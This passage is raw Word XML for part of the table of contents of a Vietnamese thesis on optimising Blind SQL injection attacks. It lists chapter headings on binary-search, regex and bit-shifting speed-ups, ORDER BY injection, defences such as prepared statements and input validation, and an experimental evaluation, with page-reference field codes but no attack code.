              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hạn chế của tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374327 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</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28" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Các phương pháp tối ưu hóa truyền thống</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374328 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</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31" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</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Tối ưu hóa sử dụng thuật toán tìm kiếm nhị phân</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374331 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</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32" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</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Tối ưu hóa sử dụng Regex</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374332 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</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33" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.</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Tối ưu hóa sử dụng phương pháp dịch bit</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374333 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</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34" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4.</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Phương pháp tối ưu bằng cách dùng Bin2Pos</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374334 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</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35" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Hướng tiếp cận mới trong khai thác lỗ hổng Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374335 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</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36" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 3: Đề xuất tối ưu hóa tấn công Blind SQL injection dựa trên phân tích thứ tự nội dung trả về.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374336 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</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37" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Khai thác SQL injection trong mệnh đề ORDER BY</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374337 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</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38" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</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Mệnh đề Order by trong truy vấn SQL</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374338 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</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39" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</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Lỗ hổng SQL Injection trong truy vấn sử dụng mệnh đề Order By</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374339 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</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40" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kỹ thuật tối ưu dựa trên tối ưu hóa nội dung trả về</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374340 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</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43" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.</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Phương pháp sắp xếp và trích xuất dựa trên thứ tự trả về của dữ liệu</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374343 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</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44" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.</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Giới hạn của phương pháp</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374344 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</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45" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.</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Mở rộng trong tấn công Blind SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374345 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</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46" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Giải pháp phòng chống tấn công SQL injection</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374346 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</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50" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</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Sử dụng Domain Driven Security</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374350 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</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51" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</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Sử dụng kỹ thuật Prepare Statement</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374351 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</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52" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.</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Sử dụng xác nhận đầu vào (Validating input)</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374352 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</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53" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.</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Sử dụng kỹ thuật phòng thủ mức Platform level</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374353 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</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54" w:history="1">
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3" w:rsidRPr="003A588C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Xây dựng thực nghiệm và đánh giá kết quả tối ưu hóa</w:t>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc459374354 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00D655B3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
